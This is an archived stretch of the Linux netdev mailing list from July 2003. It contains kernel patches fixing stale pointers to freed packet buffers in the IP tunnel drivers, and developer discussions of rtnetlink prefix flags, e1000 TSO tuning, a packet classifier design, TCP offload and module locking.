--1607745702-670464987-1058312460=:14682 Content-Type: TEXT/PLAIN; charset=US-ASCII Hello, The attached patches fix similar bug to many places (I'm not sure if there are more instances), where pointers remain to refer to freed skbs. For 2.5 and 2.4. Regards -- Julian Anastasov --1607745702-670464987-1058312460=:14682 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="ipip_old_iph-1.diff" Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: ipip Content-Disposition: attachment; filename="ipip_old_iph-1.diff" LS0tIGxpbnV4L25ldC9pcHY0L2lwaXAuYy5vbGRfaXBoCVNhdCBKdWwgMTIg MTE6MDk6MjkgMjAwMw0KKysrIGxpbnV4L25ldC9pcHY0L2lwaXAuYwlXZWQg SnVsIDE2IDAyOjE4OjQxIDIwMDMNCkBAIC02MTYsNiArNjE2LDcgQEANCiAJ CQlza2Jfc2V0X293bmVyX3cobmV3X3NrYiwgc2tiLT5zayk7DQogCQlkZXZf a2ZyZWVfc2tiKHNrYik7DQogCQlza2IgPSBuZXdfc2tiOw0KKwkJb2xkX2lw aCA9IHNrYi0+bmguaXBoOw0KIAl9DQogDQogCXNrYi0+bmgucmF3ID0gc2ti X3B1c2goc2tiLCBzaXplb2Yoc3RydWN0IGlwaGRyKSk7DQo= --1607745702-670464987-1058312460=:14682 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="ip_gre_old_iph-1.diff" Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: ip_gre Content-Disposition: attachment; filename="ip_gre_old_iph-1.diff" LS0tIGxpbnV4L25ldC9pcHY0L2lwX2dyZS5jLm9sZF9pcGgJU2F0IEp1bCAx MiAxMTowOToyOSAyMDAzDQorKysgbGludXgvbmV0L2lwdjQvaXBfZ3JlLmMJ V2VkIEp1bCAxNiAwMjoxMjo1NiAyMDAzDQpAQCAtODE2LDYgKzgxNiw3IEBA DQogCQkJc2tiX3NldF9vd25lcl93KG5ld19za2IsIHNrYi0+c2spOw0KIAkJ ZGV2X2tmcmVlX3NrYihza2IpOw0KIAkJc2tiID0gbmV3X3NrYjsNCisJCW9s ZF9pcGggPSBza2ItPm5oLmlwaDsNCiAJfQ0KIA0KIAlza2ItPm5oLnJhdyA9 IHNrYl9wdXNoKHNrYiwgZ3JlX2hsZW4pOw0K --1607745702-670464987-1058312460=:14682 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="sit_iph6-1.diff" Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: sit Content-Disposition: attachment; filename="sit_iph6-1.diff" LS0tIGxpbnV4L25ldC9pcHY2L3NpdC5jLm9sZF9pcGg2CVNhdCBKdWwgMTIg MTE6MDk6MjkgMjAwMw0KKysrIGxpbnV4L25ldC9pcHY2L3NpdC5jCVdlZCBK 
dWwgMTYgMDI6MjM6MDYgMjAwMw0KQEAgLTU1MCw2ICs1NTAsNyBAQA0KIAkJ CXNrYl9zZXRfb3duZXJfdyhuZXdfc2tiLCBza2ItPnNrKTsNCiAJCWRldl9r ZnJlZV9za2Ioc2tiKTsNCiAJCXNrYiA9IG5ld19za2I7DQorCQlpcGg2ID0g c2tiLT5uaC5pcHY2aDsNCiAJfQ0KIA0KIAlza2ItPm5oLnJhdyA9IHNrYl9w dXNoKHNrYiwgc2l6ZW9mKHN0cnVjdCBpcGhkcikpOw0K --1607745702-670464987-1058312460=:14682-- From krkumar@us.ibm.com Tue Jul 15 17:12:58 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 17:13:13 -0700 (PDT) Received: from e4.ny.us.ibm.com (e4.ny.us.ibm.com [32.97.182.104]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G0CoFl018965 for ; Tue, 15 Jul 2003 17:12:57 -0700 Received: from northrelay02.pok.ibm.com (northrelay02.pok.ibm.com [9.56.224.150]) by e4.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6G0C2wO179010; Tue, 15 Jul 2003 20:12:02 -0400 Received: from us.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay02.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6G0BwcE128366; Tue, 15 Jul 2003 20:12:00 -0400 Message-ID: <3F149847.2000408@us.ibm.com> Date: Tue, 15 Jul 2003 17:11:51 -0700 From: Krishna Kumar Organization: IBM User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.2.1) Gecko/20021130 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Krishna Kumar CC: kuznet@ms2.inr.ac.ru, yoshfuji@linux-ipv6.org, davem@redhat.com, netdev@oss.sgi.com, linux-net@vger.kernel.org Subject: Re: [PATCH 1/4] Prefix List against 2.5.73 References: <200307150117.FAA06705@dub.inr.ac.ru> <3F14492C.30708@us.ibm.com> In-Reply-To: <3F14492C.30708@us.ibm.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4075 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev > I proposechanging the values of IFA_PERM/TENT/DEPRE/SECOND, etc, On the other hand, to maintain compatibility with existing apps (ip command), I can change the new values 
instead. So now the same ip util program will display the correct flag values for the address and then display the remaining flags which are the O/M flags. I will send patch for this tomorrow. Thanks, - KK > Hi Alexey, > >>> + IFA_IFFLAGS, >> >> >> What's about ifa_flags? There is some space there, and the things >> kept there now: TENTATIVE/DEPRECATED et al. are close relatives >> of O/M. > > > > > Alexey, O/M are not flags for addresses, but for interfaces. > > > > > But tell me, please, what is the difference between new _address_ > > > > attribute IFA_IFFLAGS and already existing address attrbute > ifa_flags? > > Conceptually these are different, one for address and one for interface. > But I also > agree to your point that these can both be enclosed within one attribute > to return. > If we agree to do it in this way, then we have to change the values of > either of > the two sets of #defines (if_flags & ifa_flags since they intersect). I > propose > changing the values of IFA_PERM/TENT/DEPRE/SECOND, etc, for no other > reason other > than the MANAGED/OTHER flags has values copied off from the RA (bitwise > values of > the icmpv6_nd_ra field of RA). It might make more meaning to keep 0x80 > for field 'M' > which is the first bit of the field, but let me know if this is not > acceptable. > >> This does not pass through Occam's razor. Why not to give a filter to >> plain >> RTM_GETROUTE? We did not implement filtering not because we do not want, >> but because we (me, is more appropriate) are lazy. > > > OK, I can change that to give a filter. Is it OK to add the filter to > rtm_flags ? > I was thinking of adding RTM_F_PREFIX, and rt6_dump_route() can pass > this information > to rt6_fill_node() which does filtering of routes based on whether this > flag is set > or not. Did I understand you correctly here ? 
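The filtering idea in the quoted paragraph above can be sketched in userspace C. This is only an illustration under stated assumptions: the numeric value given to RTM_F_PREFIX, the struct route type, and the helpers route_passes_filter() and dump_routes() are hypothetical and are not taken from the patch or from the kernel; only the names RTM_F_PREFIX, rt6_dump_route() and rt6_fill_node() come from the thread.

```c
#include <stddef.h>

/* Hypothetical value: the thread does not assign a number to RTM_F_PREFIX. */
#define RTM_F_PREFIX 0x800u

/* Hypothetical stand-in for a route entry; not the kernel's route structure. */
struct route {
    const char *prefix;   /* textual prefix, for illustration only */
    unsigned int flags;   /* RTM_F_PREFIX set means "this is a prefix route" */
};

/*
 * Plays the role the thread gives to rt6_fill_node(): decide whether one
 * route is reported. If the request does not carry RTM_F_PREFIX, no
 * filtering is applied and every route passes.
 */
static int route_passes_filter(const struct route *rt, unsigned int req_flags)
{
    if (!(req_flags & RTM_F_PREFIX))
        return 1;
    return (rt->flags & RTM_F_PREFIX) != 0;
}

/*
 * Plays the role the thread gives to rt6_dump_route(): walk the table and
 * hand the request flags down to the per-route check. Pointers to matching
 * routes are stored in out (at most out_cap of them); the count is returned.
 */
static size_t dump_routes(const struct route *table, size_t n,
                          unsigned int req_flags,
                          const struct route **out, size_t out_cap)
{
    size_t count = 0;

    for (size_t i = 0; i < n && count < out_cap; i++) {
        if (route_passes_filter(&table[i], req_flags))
            out[count++] = &table[i];
    }
    return count;
}
```

A caller of such an interface would presumably still re-check the flag on every returned entry, since a kernel that does not know the flag would return all routes unfiltered.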
> >> Also, I am not sure that the interface should include things sort of >> >> + if ((addr_type & (IPV6_ADDR_LINKLOCAL | IPV6_ADDR_LOOPBACK | >> + IPV6_ADDR_MULTICAST)) != 0 || >> + addr_type == IPV6_ADDR_ANY) >> > > I can remove the check completely and introduce a new flag RTF_PREFIX_RT > to distinguish > between various route types. > > Are these modifications OK ? > > Thanks, > > - KK > >> For kernel all they are direct routes, if the application wants to apply >> some policy not formulated in terms of filters for RTM_GETROUTE, let it >> to filter itself. Moreover, I used to emphasize that user of rtnetlink >> should not believe to reliability of kernel filtering. It is just >> necessary >> measure to guarantee that a new application, which is aware of a new >> attribute, will behave correctly with older kernels, which are not aware >> of this attribute. Not a requirement, of course. >> >> Anyway, if you want to apply such specific policy, you can add a flag >> to rtm_flags, which would say: RTM_F_OFFICIALLY_PREFIX and base filtering >> on this flag, when it is given. 
>> >> Alexey >> > From kuznet@ms2.inr.ac.ru Tue Jul 15 17:21:51 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 17:21:59 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G0LnFl019474 for ; Tue, 15 Jul 2003 17:21:50 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id EAA10195; Wed, 16 Jul 2003 04:21:34 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307160021.EAA10195@dub.inr.ac.ru> Subject: Re: [PATCH 1/4] Prefix List against 2.5.73 To: krkumar@us.ibm.com (Krishna Kumar) Date: Wed, 16 Jul 2003 04:21:33 +0400 (MSD) Cc: yoshfuji@linux-ipv6.org, davem@redhat.com, netdev@oss.sgi.com, linux-net@vger.kernel.org In-Reply-To: <3F14492C.30708@us.ibm.com> from "Krishna Kumar" at éÀÌ 15, 2003 11:34:20 X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4076 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > the two sets of #defines (if_flags & ifa_flags since they intersect). I propose > changing the values of IFA_PERM/TENT/DEPRE/SECOND, This is almost impossible, it is an old public API. > which is the first bit of the field, but let me know if this is not acceptable. Select yourself: either IFA_IFFLAGS or translated flags in ifa_flags. I prefer the second way just because it is too unpleasant to add a new attribute for sake of two bits with no visible candidates to use remaining ones. > OK, I can change that to give a filter. Is it OK to add the filter to rtm_flags ? > I was thinking of adding RTM_F_PREFIX, and rt6_dump_route() can pass this information > to rt6_fill_node() which does filtering of routes based on whether this flag is set > or not. Did I understand you correctly here ? Perfectly! 
> I can remove the check completely and introduce a new flag RTF_PREFIX_RT to distinguish > between various route types. > > Are these modifications OK ? Yes, I would prefer this... Actually, it is mostly to leave possibility to override this bit administratively. :-) If you insist this is totally illegal and the rule must be hardwired, new flag is really redundant. Alexey From scott.feldman@intel.com Tue Jul 15 17:28:05 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 17:28:15 -0700 (PDT) Received: from hermes.jf.intel.com (fmr05.intel.com [134.134.136.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G0S2Fl019889 for ; Tue, 15 Jul 2003 17:28:05 -0700 Received: from talaria.jf.intel.com (talaria.jf.intel.com [10.7.209.7]) by hermes.jf.intel.com (8.11.6p2/8.11.6/d: outer.mc,v 1.66 2003/05/22 21:17:36 rfjohns1 Exp $) with ESMTP id h6G0PqR11020 for ; Wed, 16 Jul 2003 00:25:52 GMT Received: from orsmsxvs041.jf.intel.com (orsmsxvs041.jf.intel.com [192.168.65.54]) by talaria.jf.intel.com (8.11.6p2/8.11.6/d: inner.mc,v 1.35 2003/05/22 21:18:01 rfjohns1 Exp $) with SMTP id h6FNr8A01565 for ; Tue, 15 Jul 2003 23:53:09 GMT Received: from orsmsx331.amr.corp.intel.com ([192.168.65.56]) by orsmsxvs041.jf.intel.com (NAVGW 2.5.2.11) with SMTP id M2003071517275604755 ; Tue, 15 Jul 2003 17:27:56 -0700 Received: from orsmsx402.amr.corp.intel.com ([192.168.65.208]) by orsmsx331.amr.corp.intel.com with Microsoft SMTPSVC(5.0.2195.5329); Tue, 15 Jul 2003 17:27:56 -0700 content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" X-MimeOLE: Produced By Microsoft Exchange V6.0.6375.0 Subject: RE: [patch] e1000 TSO parameter Date: Tue, 15 Jul 2003 17:27:56 -0700 Message-ID: X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: [patch] e1000 TSO parameter Thread-Index: AcNKkXfnLmDm+gDET0axp1OGYzd6LwAnoLlw From: "Feldman, Scott" To: Cc: , X-OriginalArrivalTime: 16 Jul 2003 00:27:56.0650 (UTC) FILETIME=[1A7EBCA0:01C34B31] 
Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6G0S2Fl019889 X-archive-position: 4077 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: scott.feldman@intel.com Precedence: bulk X-list: netdev > TSO disabled: > > $ modprobe InterruptThrottleRate=0,0,0,0 TSO=0,0,0,0 If you're trying to remove all interrupt moderation, you'll also want to add these: RxIntDelay=0,0,0,0 RxAbsIntDelay=0,0,0,0 TxIntDelay=0,0,0,0 TxAbsIntDelay=0,0,0,0 See the app note here for more info: http://www.intel.com/design/network/applnots/8254x_ap450.htm -scott From davidm@napali.hpl.hp.com Tue Jul 15 17:41:41 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 17:41:52 -0700 (PDT) Received: from palrel10.hp.com (palrel10.hp.com [156.153.255.245]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G0feFl020474 for ; Tue, 15 Jul 2003 17:41:40 -0700 Received: from hplms2.hpl.hp.com (hplms2.hpl.hp.com [15.0.152.33]) by palrel10.hp.com (Postfix) with ESMTP id 3E7BA1C01964; Tue, 15 Jul 2003 17:41:40 -0700 (PDT) Received: from napali.hpl.hp.com (napali.hpl.hp.com [15.4.89.123]) by hplms2.hpl.hp.com (8.12.9/8.12.9/HPL-PA Hub) with ESMTP id h6G0fdAR025744; Tue, 15 Jul 2003 17:41:39 -0700 (PDT) Received: from napali.hpl.hp.com (localhost [127.0.0.1]) by napali.hpl.hp.com (8.12.3/8.12.3/Debian-5) with ESMTP id h6G0fdrK004164; Tue, 15 Jul 2003 17:41:39 -0700 Received: (from davidm@localhost) by napali.hpl.hp.com (8.12.3/8.12.3/Debian-5) id h6G0fdLh004160; Tue, 15 Jul 2003 17:41:39 -0700 From: David Mosberger MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <16148.40771.167565.322759@napali.hpl.hp.com> Date: Tue, 15 Jul 2003 17:41:39 -0700 To: "Feldman, Scott" Cc: , , Subject: RE: [patch] e1000 TSO parameter In-Reply-To: References: X-Mailer: VM 7.07 under Emacs 21.2.1 Reply-To: davidm@hpl.hp.com X-URL: 
http://www.hpl.hp.com/personal/David_Mosberger/ X-archive-position: 4078 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davidm@napali.hpl.hp.com Precedence: bulk X-list: netdev >>>>> On Tue, 15 Jul 2003 17:27:56 -0700, "Feldman, Scott" said: >> TSO disabled: >> $ modprobe InterruptThrottleRate=0,0,0,0 TSO=0,0,0,0 Scott> If you're trying to remove all interrupt moderation, you'll Scott> also want to add these: Scott> RxIntDelay=0,0,0,0 RxAbsIntDelay=0,0,0,0 TxIntDelay=0,0,0,0 Scott> TxAbsIntDelay=0,0,0,0 Scott> See the app note here for more info: Scott> http://www.intel.com/design/network/applnots/8254x_ap450.htm I wasn't aware of that note. Thanks for the pointer! --david From hadi@cyberus.ca Tue Jul 15 18:02:40 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 18:02:47 -0700 (PDT) Received: from mail.cyberus.ca (mail.cyberus.ca [209.195.118.111]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G12dFl021730 for ; Tue, 15 Jul 2003 18:02:40 -0700 Received: from cpe0030ab124d2f-cm014500000962.cpe.net.cable.rogers.com ([24.103.99.32] helo=[10.0.0.9]) by mail.cyberus.ca with esmtp (Exim 4.12) id 19cagj-000CZi-00; Tue, 15 Jul 2003 21:02:33 -0400 Subject: Re: [RFC] High Performance Packet Classifiction for tc framework From: jamal Reply-To: hadi@cyberus.ca To: nf@hipac.org Cc: linux-net@vger.kernel.org, netdev@oss.sgi.com In-Reply-To: <200307141045.40999.nf@hipac.org> References: <200307141045.40999.nf@hipac.org> Content-Type: text/plain Organization: jamalopolis Message-Id: <1058328537.1797.24.camel@jzny.localdomain> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.2.2 Date: 16 Jul 2003 01:02:02 -0400 Content-Transfer-Encoding: 7bit X-archive-position: 4079 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: hadi@cyberus.ca Precedence: bulk X-list: netdev Hi Michael, I noticed you guys like to post to the 
kernel list at times without even ccing netdev based on my browsing just now. Please send msgs to netdev first; ccing lk is optional. In fact i took it out of the cc. On Mon, 2003-07-14 at 04:45, Michael Bellion and Thomas Heinz wrote: > Hi > > We are planning to port our HIPAC algorithm to the tc framework and we > ask you for some comments about several issues. > This is good. I may have emailed you about this topic before? [..] > > Certainly, we'd like to know first whether HIPAC makes sense for the > tc framework at all. It's a classifier therefore it makes sense ;-> > From the nf-hipac worst case performance tests > we know that our algorithm should be faster in all cases as soon as > you have approx. 20 filters. Below 20 filters there is no difference > between nf-hipac and the iptables filter table. nice. What would be interesting is to see your rule update rates vs iptables (i expect iptables to suck) - but how do you compare against any of the tc classifiers for example? > So basically the question is: Are people using the tc framework with > lots of filters? Some numbers would be helpful. > I am not sure anybody could give you numbers; i have seen a posting once which talked about 1K rules. I hardly use more than 10 in my setup however there may be people who will be looking (even if it is for benchmarking purposes) in the 100K range. Short answer - go for the max you can. > Since we can only improve performance of u32 and fw filters it's also > interesting whether such rulesets typically consist of those filters > in the main. > Actually theres a _lot_ of room for improvement for u32. I have played with a few tricks which will greatly up the numbers for high number of rules. > The tc framework is very flexible with respect to where filters can be > attached. Unfortunately this cannot be mapped into one HIPAC data > structure. 
Our current design allows to attach filters anywhere but > only the filters attached to the top level qdisc would benefit from the > HIPAC algorithm. Would this be a noticeable restriction? > I dont think so, but can you describe this restriction? > > Here is a short overview of the main design goals: > > - new qdisc for HIPAC which is basically a container for the filters; > it can only be attached as top level qdisc why? > - new HIPAC classifier which supports all native nf-hipac matches > (src/dst ip, proto, src/dst port, ttl, state, in_iface, icmp type, > tcpflags, fragments) and additionally fwmark I would think for cleanliness fwmark or any metadata related classification would be separate from one that is based on packet bits. > - the HIPAC classifier can only be attached to the HIPAC qdisc and vice > versa the HIPAC qdisc only accepts HIPAC classifiers We do have an issue with being able to do extended classification but building a qdisc for it is a no no. Building a qdisc that will force other classifier to structure themselves after it is even a bigger sin. Look at the action code i have (i can send you an updated patch); a better idea is to make extended classifiers an action based on another filter match. At least this is what i have been toying with and i dont think it is clean enough. what we need is to extend the filtering framework itself to have extended classifiers. > - the HIPAC qdisc consists of only one single class to which the "next" > qdisc must be attached > - the HIPAC classifier can contain a number of existing classifiers > (u32, fw, route, rsvp, tcindex) whereby the semantics is as follows: > a HIPAC classifier matches if the native matches and also each of the > embedded classifiers match; the returned tcf_result is the one from > the final classifier (=> intermediate classifiers are reduced to a > match) > - it is still possible to attach non-hipac classifiers to other qdiscs > and classes > Please junk this idea. 
Study the classification framework code and come up with something that is based on that. Second best option is to take a look at the action code. We dont want to force other classifiers in research to be constrained to your structures. This is not trying to put down work you are doing - i think you have something good. cheers, jamal From hadi@cyberus.ca Tue Jul 15 18:03:06 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 18:03:10 -0700 (PDT) Received: from mail.cyberus.ca (mail.cyberus.ca [209.195.118.111]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G135Fl021813 for ; Tue, 15 Jul 2003 18:03:06 -0700 Received: from cpe0030ab124d2f-cm014500000962.cpe.net.cable.rogers.com ([24.103.99.32] helo=[10.0.0.9]) by mail.cyberus.ca with esmtp (Exim 4.12) id 19cahF-000Ccb-00; Tue, 15 Jul 2003 21:03:05 -0400 Subject: Re: TCP IP Offloading Interface From: jamal Reply-To: hadi@cyberus.ca To: "David S. Miller" Cc: Jordi Ros , linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com, alan@storlinksemi.com In-Reply-To: <20030714225133.18395b69.davem@redhat.com> References: <20030714225133.18395b69.davem@redhat.com> Content-Type: text/plain Organization: jamalopolis Message-Id: <1058329895.1796.28.camel@jzny.localdomain> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.2.2 Date: 16 Jul 2003 01:02:33 -0400 Content-Transfer-Encoding: 7bit X-archive-position: 4080 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: hadi@cyberus.ca Precedence: bulk X-list: netdev On Tue, 2003-07-15 at 01:51, David S. Miller wrote: > > Note that Microsoft is considering TOE under its Scalable Networking > > Program. To keep linux competitive, I would encourage a healthy > > discussion on this matter > > I actually welcome Microsoft falling into this rathole of a > technology. Let them have to support that crap and have to field bug > reports on it, having to wonder who created the packets. 
And let them > deal with the negative effects TOE has on connection rates and things > like that. > > Linux will be competitive, especially if people develop the scheme I > have described several times into the hardware. There are vendors > doing this, will you choose to be different and ignore this? A friend of mine mentioned that the MS support may all be a big scam. It makes it easy to kill TOE if they get involved ;-> Yes, there will be some MIS managers who will buy the M$ B$. What about infiniband which has all this built in offloading? What happened to VIA? cheers, jamal From nalkunda@egr.msu.edu Tue Jul 15 18:35:55 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 18:36:07 -0700 (PDT) Received: from sys11.mail.msu.edu (sys11.mail.msu.edu [35.9.75.111]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G1ZsFl027496 for ; Tue, 15 Jul 2003 18:35:54 -0700 Received: from elans.cse.msu.edu ([35.9.43.164] helo=elans-pc.elans.cse.msu.edu) by sys11.mail.msu.edu with asmtp (Exim 4.10 #3) (TLSv1:RC4-MD5:128) (authenticated as nalkunda) id 19cbCu-000DY1-00; Tue, 15 Jul 2003 21:35:48 -0400 Content-Type: text/plain; charset="iso-8859-1" From: N N Ashok Organization: CSE, Michigan State University To: Krishna Kumar Subject: Re: Kernel locking up in module Date: Tue, 15 Jul 2003 21:28:34 -0400 User-Agent: KMail/1.4.3 Cc: netdev@oss.sgi.com, Stephen Hemminger References: <200307142031.15122.nalkunda@egr.msu.edu> In-Reply-To: <200307142031.15122.nalkunda@egr.msu.edu> MIME-Version: 1.0 Message-Id: <200307152128.34341.nalkunda@egr.msu.edu> Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6G1ZsFl027496 X-archive-position: 4081 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: nalkunda@egr.msu.edu Precedence: bulk X-list: netdev On Monday 14 July 2003 20:31, N N Ashok scrawled: > On Monday 14 July 2003 20:28, Krishna Kumar scrawled: > > > 
> but the variable is non-null every other time I insert the module. > > > > Are you adding any new devices after the init() routine executes ? You > > seem to have exited the for loop due to bwusage becoming NULL, not the > > dev (while both should be null). > > Hi, > I am not modifying the dev list in any way. I am just accessing the > list to get the stats for each device (get_stats()). And exactly as you > said, the bwusage becomes NULL before dev, although there is a one-to-one > correspondence between the list of dev and bwusage. > > > > You are not locking out the bottom half receive thread so it will > > > > deadlock > > > > Stephen, I don't understand how this is a deadlock ? His handler runs > > only in the bottom half and he has no other code which runs in regular or > > hard interrupt context. But you might want to try doing the mod_timer > > after dropping > > the lock to avoid a race (though not very likely ?). Unless it is > > re-entrant, > > which seems unlikely since he is using a 1 second timeout. > > I did have mod_timer() after unlocking but then I thought maybe > modifying the timer without locking it might cause some problem. So I put > it within the locked code. > > > BTW, you are assigning 'data' in your routine, which is OK, > > unsigned long *data = (unsigned long *) ptr; > > but if you reference it, that will crash the system since it is referring > > to a local stack variable of another routine. > > I had been using data in my routine earlier, I used it instead of the > 'count' variable to limit the number of times the routine was executed. But > again, thinking that might be the problem, I used a static variable in the > routine. > > After getting the replies, I tried to use spin_lock_bh() as well as > write_lock_bh() to lock/unlock, but the routine still exits with the > bwusage being NULL. In fact, it exits with bwusage being NULL every > alternate time I insert the module. Might or might not be just a > coincidence.
> > Thanks again, > Ashok > > > - KK > > > > On Monday 14 July 2003 18:49, Stephen Hemminger scrawled: > > > On Mon, 14 Jul 2003 17:46:30 -0400 > > > > > > N N Ashok wrote: > > > > Hi All, > > > > I am creating a module to measure the outgoing bandwidth usage on > > > > the > > > > > > interfaces. It uses the get_stats() of the device to get the current > > > > stats and then computes the bandwidth usage. The algorithm for the > > > > usage > > > > > > calculation are borrowed from iproute2 package (tc/tc_estimator.c). > > > > The problem is that the kernel keeps locking up. I am using rwlock_t > > > > locks > > > > to > > > > > > lock the data. In the code, I traverse the list of bwusage structures > > > > and > > > > > > as a debug message am printing whether the traversal ended in the > > > > variable becoming null (which it should if everything went right), > > > > but the variable is non-null every other time I insert the module. > > > > printk(KERN_INFO "bwestimator: dev: %s. bwusage: %s.\n", dev ? > > > > "non-null" : "null", bwusage ? "non-null" : "null"); > > > > > > > > I think this has got to do with some locking issues. As this is my > > > > first go at the kernel locking, I might have used the wrong kind of > > > > locks. I have attached the module source, header and the log messages > > > > as > > > > > > I inserted the module a couple of times. I request you all to please > > > > help > > > > > > me as I am totally lost here. > > > > > > > > Thanks, > > > > Ashok > > > > > > You are not locking out the bottom half receive thread so it will > > > > deadlock > > > > > when it runs while your code holds the top half lock. From what I read in "Understanding the Linux Kernel", the timer routine that I setup is executed from the bottom half. Also the book says that for data structures accessed in deferrable functions (which a bottom half handler is, I think), no locking/protection of any kind is required on uniprocessor machines.
Also it says that if we try to acquire a spin_lock on a uniprocessor in the kernel, then the kernel control path that does have the lock will not get a chance to release the lock and hence we will have a deadlock. In this context, I am unable to understand whether I should use locking and if so which kind. Do I need to disable the IRQs (_irq) when I take the lock? Or do I disable the bottom halves (_bh) ? Please help me in understanding and resolving the problem as it is required for my thesis. Thanks and Regards, Ashok From davem@redhat.com Tue Jul 15 18:49:51 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 18:50:02 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G1noFl028106 for ; Tue, 15 Jul 2003 18:49:51 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id SAA15437; Tue, 15 Jul 2003 18:39:11 -0700 Date: Tue, 15 Jul 2003 18:39:11 -0700 From: "David S. 
Miller" To: davidm@hpl.hp.com Cc: davidm@napali.hpl.hp.com, scott.feldman@intel.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: [patch] e1000 TSO parameter Message-Id: <20030715183911.1c18cc15.davem@redhat.com> In-Reply-To: <16148.34787.633496.949441@napali.hpl.hp.com> References: <20030714214510.17e02a9f.davem@redhat.com> <16147.37268.946613.965075@napali.hpl.hp.com> <20030714223822.23b78f9b.davem@redhat.com> <16148.34787.633496.949441@napali.hpl.hp.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4082 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Tue, 15 Jul 2003 16:01:55 -0700 David Mosberger wrote: > >>>>> On Mon, 14 Jul 2003 22:38:22 -0700, "David S. Miller" said: > > DaveM> But I don't think that's what is happening here, rather the > DaveM> PCI controller is "talking" to the CPU's L2 cache with > DaveM> coherency transactions on all the data of every packet going > DaveM> to the chip. > > That's true. But shouldn't it be true for both the TSO and non-TSO > case? The transfers are each longer in the TSO case, so more data needs to be transferred from the bus just to get _one_ of the sub-packets of the large TSO frame out. It thus makes it more likely there'll be a delay. > DaveM> I know how this can be fixed, can you use L2-bypassing stores > DaveM> in your csum_and_copy_from_user() and copy_from_user() > DaveM> implementations like we do on sparc64? That would exactly > DaveM> eliminate this situation where the card is talking to the > DaveM> cpu's L2 cache for all the data during the PCI DMA transaction > DaveM> on the send side. > > We could, but would it always be a win? Especially for > copy_from_user().
